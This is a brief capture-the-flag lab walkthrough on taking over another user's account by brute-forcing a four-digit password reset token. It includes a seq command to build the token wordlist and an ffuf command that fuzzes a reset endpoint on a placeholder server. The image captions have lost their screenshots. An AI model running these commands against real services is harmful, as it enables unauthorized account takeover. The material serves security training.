Brute-Forcing Password Reset Tokens

Takeover another user's account on the target system to obtain the flag.

In order to exploit the password reset functionallity we must first find the reset endpoint

Step 1 - Access the Web Application and Reset the Password:

Step 2 - Insert a username and click Submit:

Step 3 - Click on here:

Step 4 - Get the password reset token endpoint:

• You'll get this warning. Click again on submit:

• And we got the endpoint:

Step 4 - Brute-force the reset token:

• Create a numeric wordlist with all possible combinations:

  • Copy

    seq -w 0 9999 > tokens.txt

• Use the wordlist to brute-force the token with ffuf:

  • Copy

    ffuf -w ./tokens.txt -u http://SERVER_IP:SERVER_PORT/reset_password.php?token=FUZZ -fr "The provided token is invalid"

  

Step 5 - Reset the password:

• Insert the token at the end of the URL:

• Change the password:

Step 6 - Retrieve the flag:

• After reseting the password, login into the application with the credentials and retrieve the flag: